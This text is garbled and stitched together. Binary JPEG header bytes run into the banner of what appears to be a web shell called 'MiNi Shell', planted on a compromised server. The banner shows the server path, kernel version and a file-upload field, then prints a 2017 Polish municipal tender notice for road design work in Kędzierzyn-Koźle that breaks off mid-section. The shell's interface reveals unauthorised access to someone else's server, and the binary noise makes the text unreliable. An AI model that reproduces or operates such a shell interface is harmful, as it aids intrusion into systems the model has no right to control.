JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170407/61939-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://http//przetargi.kedzierzynkozle.pl' target='_blank'>http://http//przetargi.kedzierzynkozle.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 61939 - 2017
              z dnia 2017-04-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kędzierzyn-Koźle: Wykonanie usługi projektowania dróg:
CZĘŚĆ  I - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Marynarskiej w Kędzierzynie-Koźlu 
CZĘŚĆ II - Dokumentacja projektowo-kosztorysowa rozbudowy pasa drogowego ul. Żabienieckiej o chodnik w Kędzierzynie-Koźlu
CZĘŚĆ III  - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Wierzbowej w Kędzierzynie-Koźlu
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Kędzierzyn-Koźle, Wydział Zamówień Publicznych, krajowy numer identyfikacyjny
              52450700000, ul.
              ul. Piramowicza 
              32,
              47200  
              Kędzierzyn-Koźle, woj.
              opolskie, państwo
              Polska, tel.
              77 40 34 451, e-mail
              zp@kedzierzynkozle.pl, faks
              77 40 34 451.
              <br />
              Adres strony internetowej (URL): http//przetargi.kedzierzynkozle.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http//przetargi.kedzierzynkozle.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http//przetargi.kedzierzynkozle.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać pod rygorem nieważności w formie pisemnej, zgodnie z wymaganiami SIWZ<br />
                Adres:
                <br />Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle, ul. Piramowicza 32/pok. 417, III p 47-200 Kędzierzyn-Koźle</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie usługi projektowania dróg:
CZĘŚĆ  I - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Marynarskiej w Kędzierzynie-Koźlu 
CZĘŚĆ II - Dokumentacja projektowo-kosztorysowa rozbudowy pasa drogowego ul. Żabienieckiej o chodnik w Kędzierzynie-Koźlu
CZĘŚĆ III  - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Wierzbowej w Kędzierzynie-Koźlu
<br /><b>Numer referencyjny: </b>ZP.271.32.2017.AK<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ  I  - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Marynarskiej w Kędzierzynie-Koźlu 
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb przebudowy i rozbudowy pasa drogowego ul. Marynarskiej w Kędzierzynie-Koźlu, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie wariantowej koncepcji programowej drogi i jej pozytywne uzgodnienie z Zamawiającym, zarządcą drogi, Radą Osiedla Kłodnica;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach   rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego oraz przekazanie szkicu geodezyjnego po jej przeprowadzeniu.
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w Kędzierzynie-Koźlu przy 
ul. Marynarskiej w obrębie Kłodnica na działkach oznaczonych numerem 1052/4, 1076, 1055/4, 1055/3, 1072, 1071, 1070, 1069/1, 1065. Nie wyklucza się dodatkowych działek związanych z rozbudową ulicy, powiązaniem z istniejącymi dojazdami, ciągami pieszymi, dojściami do posesji (klatek schodowych), przebudową uzbrojenia.
3.Działka nr 1052/4 o powierzchni 1,0654 ha jest pasem drogowym ul. Marynarskiej i stanowi własność Gminy Kędzierzyn-Koźle (OP1K/00069879/4). Działki o nr 1065 i 1072 stanowią własność Gminy Kędzierzyn-Koźle (użytek B), pozostałe ww. działki stanowią własność prywatną. 
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest:
1)na terenie funkcjonalnym określonym jako teren usługowo-wytwórczy  Centrum Logistyczne UW-1, tereny zabudowy mieszkaniowej wielorodzinnej i usług nieuciążliwych MWU, w ramach jednostki planistycznej D-Kłodnica;
2)w granicy strefy B ochrony konserwatorskiej;
3)w granicy obszaru potencjalnego zagrożenia powodziowego o umiarkowanym zagrożeniu powodzią;
4)w granicy strefy ochrony istniejących i projektowanych wałów przeciwpowodziowych.
6.Ul. Marynarska podlegająca przebudowie i rozbudowie jest drogą bez przejazdu rozpoczynającą swój przebieg od skrzyżowania ulic Pocztowej i Chełmońskiego, na podstawie zapisów wytycznych zarządcy drogi powinna się kończyć placem manewrowym o pow. 400m2 i ukształtowanym w sposób umożliwiający właściwe manewrowanie pojazdami technicznymi i ratownictwa.
7.Dodatkowo informujemy, że dokumentacja projektowa musi być spójna z zatwierdzoną i realizowaną dokumentacją projektową Przebudowy ulicy Chełmońskiego w Kędzierzynie-Koźlu w zakresie skrzyżowania ulic Chełmońskiego, Pocztowej i Marynarskiej. 
CZĘŚĆ II   - Dokumentacja projektowo-kosztorysowa rozbudowy pasa drogowego ul. Żabienieckiej o chodnik w Kędzierzynie-Koźlu
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb rozbudowy pasa drogowego ul. Żabienieckiej o chodnik, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie koncepcji programowej rozbudowy drogi  jej pozytywne uzgodnienie z Zamawiającym, zarządcami dróg i właściwą Radą Osiedla;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacja dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego raz przekazanie szkicu geodezyjnego po jej przeprowadzeniu;
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w Kędzierzynie-Koźlu przy ul. Żabienieckiej  i na działkach oznaczonych  numerami 798/4, 683/3, 683/2, 601, 798/5. Nie wyklucza się dodatkowych działek związanych z przyłączeniem obiektu do mediów zewnętrznych.
3.Działki nr 798/4 o powierzchni 0,8525  ha jest pasem drogowym ul. Żabienieckiej, działka nr 683/2 o powierzchni 0,0050 ha jest pasem drogowym ul. Żabienieckiej, działka nr 683/3 o powierzchni 0,0875 ha jest pasem drogowym ul. Żabienieckiej, działka nr 798/5 o powierzchni 0,1317 ha jest pasem drogowym ul. Żabienieckiej i stanowią własność Gminy Kędzierzyn-Koźle.
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania  i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest:
5)na terenie funkcjonalnym określonym jako tereny zabudowy mieszkaniowej wielorodzinnej niskiej i usług nieuciążliwych MWNU, w ramach jednostki planistycznej D-Kłodnica;
6)w granicy strefy B ochrony konserwatorskiej;
7)część działki 798/4, 798/5 : przeznaczenie funkcjonalne ZP  tereny zieleni parkowej, część działek : KL  drogi publiczne klasy drogi lokalnej;
6.Istotne informacje :
Na zlecenie Zarządu Dróg Wojewódzkich została opracowana dokumentacja projektowa związku z budową sygnalizacji świetlnej na istniejącym przejściu dla pieszych na skrzyżowaniu ul. Kłodnickiej  z ul. Szymanowskiego i ul. Kłosową. W swym zakresie obejmuje rejon wlotu ul. Żabienieckiej do ul. Kłodnickiej
CZĘŚĆ III  - Dokumentacja projektowo-kosztorysowa przebudowy  ul. Wierzbowej w Kędzierzynie-Koźlu
  Wspólny słownik zamówień (CPV): 71.32.20.00-1
1.Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług dla potrzeb przebudowy i rozbudowy pasa drogowego ul. Wierzbowej w Kędzierzynie-Koźlu, a obejmujących w szczególności:
1)wykonanie opracowań przedprojektowych:
a)opracowań geodezyjnych,
b)dokumentacji geotechnicznej;
2)opracowanie wariantowej koncepcji programowej drogi i jej pozytywne uzgodnienie z Zamawiającym, zarządcą drogi, Radą Osiedla Pogorzelec i RSM CHEMIK;
3)przygotowanie niezbędnych materiałów do wydania decyzji o zezwoleniu na realizację inwestycji drogowej (zwaną dalej ZRID) w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych, w tym opracowanie:
a)wielobranżowego projektu budowlanego wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia i zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji (zwanym dalej dokumentami formalno-prawnymi),
b)projektu stałej organizacji ruchu,
c)pozostałych materiałów wymaganych do wniosku o wydanie ZRID,
d)kompletnej dokumentacji geodezyjno-prawnej związanej z nabyciem nieruchomości położonych w liniach rozgraniczających nowego pasa i czasowym korzystaniem z nieruchomości w związku z prowadzeniem robót na ich terenie,
e)dokumentacji do odszkodowań oraz uzyskanie w imieniu i na rzecz Zamawiającego przedmiotowej decyzji;
4)przygotowanie dokumentacji do zgłoszenia robót niewymagających pozwolenia na budowę lub dla obiektów do rozbiórki poza liniami rozgraniczającymi drogę (w razie konieczności),
5)dostarczenie Zamawiającemu kompletnej dokumentacji do przeprowadzenia procedury przetargowej na wykonanie robót, w tym:
a)projekty wykonawcze poszczególnych branż,
b)specyfikacje techniczne wykonania i odbioru robót budowlanych dla ww. branż,
c)przedmiary robót dla ww. branż,
d)kosztorys inwestorski wraz z zestawieniem kosztów inwestycji;
6)stabilizacja granic pasa drogowego oraz przekazanie szkicu geodezyjnego po jej przeprowadzeniu.
2.Inwestycja, do której odnosi się niniejsze zamówienie zlokalizowana jest w obrębie Kędzierzyn na działce oznaczonej numerem 863/39  (ark. m. 5). Będzie konieczność uwzględnienia dodatkowych działek związanych z rozbudową ulicy, powiązaniem z istniejącymi dojazdami, ciągami pieszymi, dojściami do posesji (klatek schodowych), przebudową uzbrojenia.
3.Działka ww. ma powierzchnię 0,2748 ha i stanowi własność Gminy Kędzierzyn-Koźle (KW 50016).
4.Informujemy, że Gmina Kędzierzyn Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX/98/2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.), co oznacza, że ustalenie przeznaczenia terenu, rozmieszczenie inwestycji celu publicznego oraz określenie sposobów zagospodarowania i warunków zabudowy terenu następuje właśnie w m.p.z.p.
5.Zgodnie z zapisami m.p.z.p. teren inwestycji położony jest na terenie funkcjonalnym określonym jako tereny zabudowy mieszkaniowej wielorodzinnej i usług nieuciążliwych o symbolu MWU w ramach jednostki planistycznej F  Kędzierzyn Pogorzelec.
6.Ul. Wierzbowa podlegająca przebudowie i rozbudowie jest drogą bez przejazdu rozpoczynającą swój przebieg od Placu Jana Surzyckiego i na podstawie zapisów w mpzp powinna się kończyć placem manewrowym o pow. 400m2 i ukształtowanym w sposób umożliwiający właściwe manewrowanie pojazdami technicznymi i ratownictwa.
7.Dodatkowo informujemy, że firma AQWA s.c. z Głubczyc na zlecenie Zamawiającego opracowuje projekt placu zabaw przy Przedszkolu Publicznym nr 23 ul. Wierzbowej 4 (w załączeniu rysunek zagospodarowania terenu). 
Zamawiający informuje, iż nie stawia wymogu określonego w art. 29 ust. 3a Ustawy Pzp, polegającego na tym, że osoby zaangażowane w realizację zamówienia były zatrudnione na umowie o pracę na podstawie ustawy z dnia 26 czerwca 1974 roku Kodeks Pracy (Dz. U. z 2014r., poz. 1502 z późn. zm).
Szczegółowy opis przedmiotu zamówienia określa niniejsza SIWZ oraz cz. III SIWZ - Opis przedmiotu zamówienia, cz. II Istotne postanowienia umowy wraz z załącznikami zamieszczone w wersji elektronicznej na stronie internetowej Zamawiającego: http://przetargi.kedzierzynkozle.pl/ stanowiące integralną częścią SIWZ.<br /><br /><b>II.5) Główny kod CPV: </b>71322000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamówienie należy zrealizować w terminie ustalonym w ofercie Wykonawcy zgodnie z zasadami wskazanymi w niniejszej SIWZ i przypadającym w okresie nie dłuższym niż dla części I - 40 tygodni, dla części II - 41 tygodni, dla części III - 240 dni kalendarzowych od daty zawarcia umowy</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca wskaże osoby do realizacji niniejszego zamówienia publicznego, które spełniają następujące warunki:
minimum jedną osobą do wykonania zamówienia, która będzie pełnić funkcję Projektanta branży drogowej, posiadającą uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie tj. do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń, wydane na podstawie:
a.	Rozporządzenia Ministra Transportu i Budownictwa z dnia 24 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278), lub
b.	odpowiadające im ważne uprawnienia w zakresie odpowiadającym powyższym wymaganiom, wydane na podstawie wcześniej obowiązujących przepisów
legitymującą się w okresie ostatnich 3 lat przed upływem terminu składania ofert doświadczeniem w zakresie wykonania:

DLA CZĘŚCI I ZAMÓWIENIA:
- co najmniej dwóch dokumentacji projektowych budowy/przebudowy/rozbudowy drogi o długości min. 200 mb realizowanej w trybie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych  

DLA CZĘŚCI II ZAMÓWIENIA:
